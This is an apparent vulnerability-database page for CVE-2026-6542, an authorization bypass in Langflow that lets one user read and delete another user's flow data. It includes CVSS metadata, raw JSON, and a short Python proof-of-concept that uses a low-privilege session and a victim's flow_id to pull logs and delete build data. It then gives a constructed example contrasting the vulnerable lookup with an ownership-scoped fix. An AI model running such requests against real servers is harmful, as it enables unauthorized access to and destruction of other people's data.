Security Vulnerability Report
CVE-2026-6542 CVSS 6.5 MEDIUM

CVE-2026-6542

Published: 2026-04-30 22:16:26
Last Modified: 2026-05-04 18:21:23

Description

IBM Langflow OSS 1.0.0 through 1.8.4 could allow any user to supply a flow_id to read transaction logs and vertex build data belonging to other users, and to delete persisted vertex build data for another user's flow.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:* - VULNERABLE
IBM Langflow OSS 1.0.0 - 1.8.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL configuration
target_host = "http://vulnerable-langflow-server:5000"
attacker_cookie = "session_id_of_low_priv_user"
victim_flow_id = "uuid_of_victim_flow"

headers = {
    "Cookie": f"session={attacker_cookie}",
    "Content-Type": "application/json"
}

# 1. Exploit: Read transaction logs and vertex build data
# The API fails to check if the attacker owns victim_flow_id
read_logs_url = f"{target_host}/api/v1/flows/{victim_flow_id}/logs"
response = requests.get(read_logs_url, headers=headers)
if response.status_code == 200:
    print("[+] Successfully exfiltrated victim's transaction logs:")
    print(response.text)
else:
    print("[-] Failed to read logs")

# 2. Exploit: Delete persisted vertex build data
# The API allows deletion of data owned by another user
delete_data_url = f"{target_host}/api/v1/flows/{victim_flow_id}/data"
del_response = requests.delete(delete_data_url, headers=headers)
if del_response.status_code == 200:
    print("[+] Successfully deleted victim's persisted vertex build data")
else:
    print("[-] Failed to delete data")
```
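The weakness behind this CVE is CWE-639 (authorization bypass through a user-controlled key): a flow_id supplied by the caller selects the record, and the server never checks that the caller owns that flow. The following is an added, constructed example (not Langflow's code; the in-memory store, user names, flow ids and function names are all invented for illustration) showing the vulnerable lookup beside its hardened form, where ownership becomes part of the lookup itself rather than a separate check that can be forgotten.

```python
"""
Constructed example (not Langflow's code): an IDOR (CWE-639) on a flow_id
parameter, shown as the vulnerable lookup beside its hardened form.
Data store, users and function names below are invented for illustration.
"""
from dataclasses import dataclass, field
from typing import Dict, List


class NotFound(Exception):
    """Raised when a flow does not exist *for the calling user*."""


@dataclass
class Flow:
    flow_id: str
    owner_id: str
    transaction_logs: List[str] = field(default_factory=list)
    vertex_builds: Dict[str, dict] = field(default_factory=dict)


# Constructed sample data: two users, each owning one flow.
FLOWS: Dict[str, Flow] = {}


def reset_store() -> None:
    """(Re)populate the constructed store so each demonstration starts clean."""
    FLOWS.clear()
    FLOWS["flow-alice"] = Flow("flow-alice", "alice",
                               ["alice: ran vertex v1"], {"v1": {"status": "ok"}})
    FLOWS["flow-bob"] = Flow("flow-bob", "bob",
                             ["bob: ran vertex v7"], {"v7": {"status": "ok"}})


reset_store()


# --- Vulnerable pattern: the flow_id alone selects the record ---------------
def get_logs_vulnerable(flow_id: str, current_user: str) -> List[str]:
    # current_user is accepted but never compared with the flow's owner,
    # so any authenticated user can read any flow's transaction logs.
    flow = FLOWS.get(flow_id)
    if flow is None:
        raise NotFound(flow_id)
    return list(flow.transaction_logs)


def delete_builds_vulnerable(flow_id: str, current_user: str) -> int:
    # Same defect on a destructive operation: another user's persisted
    # vertex build data can be wiped by supplying their flow_id.
    flow = FLOWS.get(flow_id)
    if flow is None:
        raise NotFound(flow_id)
    removed = len(flow.vertex_builds)
    flow.vertex_builds.clear()
    return removed


# --- Hardened pattern: ownership is part of the lookup ----------------------
def get_owned_flow(flow_id: str, current_user: str) -> Flow:
    """Resolve flow_id scoped to the caller. Unknown and foreign flows are
    indistinguishable (both raise NotFound), so the endpoint does not leak
    whether a flow_id exists at all."""
    flow = FLOWS.get(flow_id)
    if flow is None or flow.owner_id != current_user:
        raise NotFound(flow_id)
    return flow


def get_logs(flow_id: str, current_user: str) -> List[str]:
    return list(get_owned_flow(flow_id, current_user).transaction_logs)


def get_vertex_builds(flow_id: str, current_user: str) -> Dict[str, dict]:
    return dict(get_owned_flow(flow_id, current_user).vertex_builds)


def delete_vertex_builds(flow_id: str, current_user: str) -> int:
    flow = get_owned_flow(flow_id, current_user)
    removed = len(flow.vertex_builds)
    flow.vertex_builds.clear()
    return removed


def cross_user_access_blocked(flow_id: str, caller: str) -> bool:
    """True if the hardened endpoints refuse this caller for this flow."""
    try:
        get_logs(flow_id, caller)
        return False
    except NotFound:
        return True


if __name__ == "__main__":
    reset_store()
    print("vulnerable read by alice of bob's logs:",
          get_logs_vulnerable("flow-bob", "alice"))
    print("hardened read blocked:", cross_user_access_blocked("flow-bob", "alice"))
```

Every read and delete path in the hardened half goes through `get_owned_flow`, so a new endpoint cannot forget the ownership check; the same single-lookup shape is what a `WHERE flow_id = ? AND owner_id = ?` query gives you in a real ORM-backed service.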

References

https://www.ibm.com/support/pages/node/7270886 (IBM Support, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6542", "sourceIdentifier": "[email protected]", "published": "2026-04-30T22:16:26.340", "lastModified": "2026-05-04T18:21:23.047", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Langflow OSS 1.0.0 through 1.8.4 could allow any user to supply a flow_id to read transaction logs and vertex build data belonging to other users, and to delete persisted vertex build data for another user's flow."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.9.0", "matchCriteriaId": "2DFDBBCF-1947-4468-9C94-5CF03650A12D"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7270886", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}